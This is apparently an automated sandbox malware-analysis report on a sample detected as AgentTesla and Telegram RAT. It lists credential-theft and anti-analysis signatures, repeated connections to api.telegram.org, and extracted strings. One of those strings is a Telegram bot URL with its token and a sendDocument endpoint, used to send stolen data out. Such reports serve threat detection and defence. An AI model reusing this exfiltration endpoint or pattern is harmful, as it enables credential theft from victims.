Loading ...

Play interactive tourEdit tour

Analysis Report ttrpym.exe

Overview

General Information

Sample Name:ttrpym.exe
Analysis ID:345001
MD5:3b53c639bd8ea883e5036a040f833415
SHA1:af2f707e2e787879a67994fbad96c3e2f418dd3a
SHA256:eca6a35d952f84597c3917f4c77f8c0e2cdeea6101caa97906dc1904e6f9e0ea
Tags:exe

Most interesting Screenshot:

Detection

AgentTesla Telegram RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected Telegram RAT
.NET source code contains potential unpacker
.NET source code contains very large array initializations
.NET source code references suspicious native API functions
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Machine Learning detection for sample
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Uses the Telegram API (likely for C&C communication)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • ttrpym.exe (PID: 6400 cmdline: 'C:\Users\user\Desktop\ttrpym.exe' MD5: 3B53C639BD8EA883E5036A040F833415)
    • ttrpym.exe (PID: 6732 cmdline: {path} MD5: 3B53C639BD8EA883E5036A040F833415)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000002.614226904.0000000000F82000.00000020.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        Process Memory Space: ttrpym.exe PID: 6732JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: ttrpym.exe PID: 6732JoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.ttrpym.exe.f80000.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

              Sigma Overview

              No Sigma rule has matched

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Multi AV Scanner detection for submitted fileShow sources
              Source: ttrpym.exeReversingLabs: Detection: 50%
              Machine Learning detection for sampleShow sources
              Source: ttrpym.exeJoe Sandbox ML: detected
              Source: 3.2.ttrpym.exe.f80000.2.unpackAvira: Label: TR/Spy.Gen8

              Compliance:

              barindex
              Uses 32bit PE filesShow sources
              Source: ttrpym.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
              Uses new MSVCR DllsShow sources
              Source: C:\Users\user\Desktop\ttrpym.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
              Uses secure TLS version for HTTPS connectionsShow sources
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49752 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49753 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49754 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49755 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49756 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49757 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49760 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49761 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49762 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49764 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49765 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49766 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49767 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49768 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49769 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49770 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49771 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49772 version: TLS 1.2
              Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
              Source: ttrpym.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

              Networking:

              barindex
              Uses the Telegram API (likely for C&C communication)Show sources
              Source: unknownDNS query: name: api.telegram.org
              Source: unknownDNS query: name: api.telegram.org
              Source: unknownDNS query: name: api.telegram.org
              Source: unknownDNS query: name: api.telegram.org
              Source: unknownDNS query: name: api.telegram.org
              Source: unknownDNS query: name: api.telegram.org
              Source: unknownDNS query: name: api.telegram.org
              Source: unknownDNS query: name: api.telegram.org
              Source: unknownDNS query: name: api.telegram.org
              Source: unknownDNS query: name: api.telegram.org
              Source: unknownDNS query: name: api.telegram.org
              Source: unknownDNS query: name: api.telegram.org
              Source: unknownDNS query: name: api.telegram.org
              Source: unknownDNS query: name: api.telegram.org
              Source: unknownDNS query: name: api.telegram.org
              Source: unknownDNS query: name: api.telegram.org
              Source: unknownDNS query: name: api.telegram.org
              Source: unknownDNS query: name: api.telegram.org
              Source: unknownDNS query: name: api.telegram.org
              Source: unknownDNS query: name: api.telegram.org
              Source: unknownDNS query: name: api.telegram.org
              Source: unknownDNS query: name: api.telegram.org
              Source: unknownDNS query: name: api.telegram.org
              Source: unknownDNS query: name: api.telegram.org
              Source: unknownDNS query: name: api.telegram.org
              Source: unknownDNS query: name: api.telegram.org
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_012BA09A recv,3_2_012BA09A
              Source: unknownDNS traffic detected: queries for: api.telegram.org
              Source: ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
              Source: ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
              Source: ttrpym.exe, 00000003.00000003.522255884.0000000007DEC000.00000004.00000001.sdmpString found in binary or memory: http://cert.s
              Source: ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpString found in binary or memory: http://certificates.godaddy.com/repository/0
              Source: ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpString found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
              Source: ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpString found in binary or memory: http://certs.godaddy.com/repository/1301
              Source: ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdig2s1-1823.crl0
              Source: ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
              Source: ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdroot.crl0F
              Source: ttrpym.exe, 00000000.00000003.235365275.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://en.w
              Source: ttrpym.exe, 00000000.00000003.234788164.0000000005E7B000.00000004.00000001.sdmp, ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
              Source: ttrpym.exe, 00000003.00000003.469945835.0000000007DCC000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.c
              Source: ttrpym.exe, 00000003.00000003.522255884.0000000007DEC000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.com/0
              Source: ttrpym.exe, 00000003.00000003.522255884.0000000007DEC000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.com/02
              Source: ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.com/05
              Source: ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpString found in binary or memory: http://pmTUNK.com
              Source: ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: ttrpym.exe, 00000000.00000003.242053272.0000000005E83000.00000004.00000001.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html
              Source: ttrpym.exe, 00000000.00000003.241273039.0000000005E83000.00000004.00000001.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlXUJl
              Source: ttrpym.exe, 00000000.00000003.239779476.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
              Source: ttrpym.exe, 00000000.00000003.240021767.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comEacdW
              Source: ttrpym.exe, 00000000.00000003.240021767.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTC
              Source: ttrpym.exe, 00000000.00000003.239779476.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comad
              Source: ttrpym.exe, 00000000.00000003.238931261.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comamFA
              Source: ttrpym.exe, 00000000.00000003.239366599.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comd
              Source: ttrpym.exe, 00000000.00000003.239779476.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comdd
              Source: ttrpym.exe, 00000000.00000003.239292340.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comes
              Source: ttrpym.exe, 00000000.00000003.238931261.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comexc
              Source: ttrpym.exe, 00000000.00000003.238931261.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comhly
              Source: ttrpym.exe, 00000000.00000003.239436981.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comkYF=
              Source: ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
              Source: ttrpym.exe, 00000000.00000003.239779476.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comma
              Source: ttrpym.exe, 00000000.00000003.239779476.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comn-u
              Source: ttrpym.exe, 00000000.00000003.239201394.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comroa
              Source: ttrpym.exe, 00000000.00000003.239436981.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comt;F
              Source: ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
              Source: ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
              Source: ttrpym.exe, 00000000.00000003.245883722.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers)Y
              Source: ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
              Source: ttrpym.exe, 00000000.00000003.245848821.0000000005E9E000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
              Source: ttrpym.exe, 00000000.00000003.245848821.0000000005E9E000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlH
              Source: ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
              Source: ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
              Source: ttrpym.exe, 00000000.00000003.245072326.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html.
              Source: ttrpym.exe, 00000000.00000003.245112917.0000000005E9E000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.htmlP
              Source: ttrpym.exe, 00000000.00000003.243841900.0000000005E7D000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/m
              Source: ttrpym.exe, 00000000.00000003.243841900.0000000005E7D000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/s
              Source: ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
              Source: ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
              Source: ttrpym.exe, 00000000.00000003.244251584.0000000005E7D000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?Y0
              Source: ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
              Source: ttrpym.exe, 00000000.00000003.244027978.0000000005E7D000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersL
              Source: ttrpym.exe, 00000000.00000003.244441566.0000000005E7D000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designerskYlH
              Source: ttrpym.exe, 00000000.00000002.264530973.00000000016D7000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comgritaC
              Source: ttrpym.exe, 00000000.00000002.264530973.00000000016D7000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comm
              Source: ttrpym.exe, 00000000.00000002.264530973.00000000016D7000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comttvaZ
              Source: ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
              Source: ttrpym.exe, 00000000.00000003.239436981.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
              Source: ttrpym.exe, 00000000.00000003.238052266.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
              Source: ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
              Source: ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
              Source: ttrpym.exe, 00000000.00000003.238160822.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/m
              Source: ttrpym.exe, 00000000.00000003.237899138.0000000005E80000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnm
              Source: ttrpym.exe, 00000000.00000003.238437682.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnomp
              Source: ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
              Source: ttrpym.exe, 00000000.00000003.247619500.0000000005E7B000.00000004.00000001.sdmp, ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
              Source: ttrpym.exe, 00000000.00000003.247669599.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmJU
              Source: ttrpym.exe, 00000000.00000003.237159926.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
              Source: ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
              Source: ttrpym.exe, 00000000.00000003.243086872.0000000005E7D000.00000004.00000001.sdmpString found in binary or memory: http://www.monotype.
              Source: ttrpym.exe, 00000000.00000003.247619500.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.monotype.2J
              Source: ttrpym.exe, 00000000.00000003.233656365.0000000005E62000.00000004.00000001.sdmp, ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
              Source: ttrpym.exe, 00000000.00000003.233656365.0000000005E62000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comt
              Source: ttrpym.exe, 00000000.00000003.242053272.0000000005E83000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
              Source: ttrpym.exe, 00000000.00000003.237222343.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.c
              Source: ttrpym.exe, 00000000.00000003.237222343.0000000005E7B000.00000004.00000001.sdmp, ttrpym.exe, 00000000.00000003.237159926.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
              Source: ttrpym.exe, 00000000.00000003.237159926.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krl
              Source: ttrpym.exe, 00000000.00000003.237159926.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krs-c
              Source: ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
              Source: ttrpym.exe, 00000000.00000003.240021767.0000000005E7B000.00000004.00000001.sdmp, ttrpym.exe, 00000000.00000003.239945309.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comlic
              Source: ttrpym.exe, 00000000.00000003.239902821.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comp
              Source: ttrpym.exe, 00000000.00000003.238437682.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comrporation
              Source: ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
              Source: ttrpym.exe, 00000000.00000003.246313205.0000000005E88000.00000004.00000001.sdmp, ttrpym.exe, 00000000.00000003.243655870.0000000005E7D000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
              Source: ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
              Source: ttrpym.exe, 00000000.00000003.243771789.0000000005E7D000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deoi
              Source: ttrpym.exe, 00000000.00000003.243571729.0000000005E7D000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.dewa
              Source: ttrpym.exe, 00000000.00000003.238783173.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
              Source: ttrpym.exe, 00000000.00000003.239436981.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnad
              Source: ttrpym.exe, 00000000.00000003.238783173.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnamFA
              Source: ttrpym.exe, 00000000.00000003.238783173.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnj
              Source: ttrpym.exe, 00000000.00000003.239436981.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnma
              Source: ttrpym.exe, 00000000.00000003.238783173.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnr-c
              Source: ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%(
              Source: ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
              Source: ttrpym.exe, 00000003.00000002.619638629.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org
              Source: ttrpym.exe, 00000003.00000002.614226904.0000000000F82000.00000020.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot1534863067:AAHgkXiWvRLedLdzn8NhreUVQl7GIuV0U6g/
              Source: ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot1534863067:AAHgkXiWvRLedLdzn8NhreUVQl7GIuV0U6g/sendDocument
              Source: ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot1534863067:AAHgkXiWvRLedLdzn8NhreUVQl7GIuV0U6g/sendDocumentdocument-----
              Source: ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmp, ttrpym.exe, 00000003.00000002.619638629.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.orgx&.q
              Source: ttrpym.exe, 00000003.00000002.619638629.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.orgx&.qloN
              Source: ttrpym.exe, 00000003.00000003.469945835.0000000007DCC000.00000004.00000001.sdmpString found in binary or memory: https://certs.godaddy.com/repositor
              Source: ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpString found in binary or memory: https://certs.godaddy.com/repository/0
              Source: ttrpym.exe, 00000003.00000002.614226904.0000000000F82000.00000020.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
              Source: ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49752 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49753 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49754 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49755 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49756 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49757 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49760 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49761 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49762 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49764 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49765 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49766 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49767 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49768 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49769 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49770 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49771 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49772 version: TLS 1.2
              Source: C:\Users\user\Desktop\ttrpym.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

              System Summary:

              barindex
              .NET source code contains very large array initializationsShow sources
              Source: 3.2.ttrpym.exe.f80000.2.unpack, u003cPrivateImplementationDetailsu003eu007b8C8394AEu002d6C21u002d4245u002dBDCBu002d313DD2DA3E81u007d/u003143B5B42u002d09A4u002d4DE1u002d9DA9u002d7F3805A0F092.csLarge array initialization: .cctor: array initializer size 12026
